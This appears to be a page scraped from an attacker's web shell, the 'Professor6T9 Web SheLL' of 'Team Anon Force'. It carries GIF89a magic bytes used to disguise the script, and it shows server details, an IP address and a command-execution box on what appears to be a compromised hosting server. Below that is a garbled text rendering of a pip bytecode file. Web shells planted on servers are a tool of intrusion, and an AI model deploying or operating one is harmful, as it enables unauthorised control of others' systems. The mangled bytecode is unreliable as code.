GIF89;aGIF89;aGIF89;a
Team Anon Force
https://t.me/Professor6T9x
Professor6T9 Web SheLL
Linux host69.registrar-servers.com 4.18.0-513.18.1.lve.2.el8.x86_64 #1 SMP Sat Mar 30 15:36:11 UTC 2024 x86_64
Apache
68.65.123.79
/
opt
/
alt
/
python310
/
lib
/
python3.10
/
site-packages
/
pip
/
_internal
/
operations
/
build
/
__pycache__
[ HOME ]
Exec
Submit
wheel.cpython-310.pyc
o ai' � @ sd d dl Z d dlZd dlmZ d dlmZ d dlmZ e �e �Z dedededed ee f d d�ZdS )� N)�Optional)�Pep517HookCaller)�runner_with_spinner_message�name�backend�metadata_directory�tempd�returnc C s� |dusJ �z,t �d|� td| � d��}|�|�� |j||d�}W d � n1 s,w Y W n tyB t �d| � Y dS w tj� ||�S )z�Build one InstallRequirement using the PEP 517 build process. Returns path to wheel if successfully built. Otherwise, returns None. NzDestination directory: %szBuilding wheel for z (pyproject.toml))r zFailed building wheel for %s) �logger�debugr �subprocess_runner�build_wheel� Exception�error�os�path�join)r r r r �runner� wheel_name� r ��/builddir/build/BUILDROOT/alt-python310-pip-21.3.1-5.el8.x86_64/opt/alt/python310/lib/python3.10/site-packages/pip/_internal/operations/build/wheel.py�build_wheel_pep517 s$ �����r ) �loggingr �typingr Zpip._vendor.pep517.wrappersr �pip._internal.utils.subprocessr � getLogger�__name__r �strr r r r r �<module> s"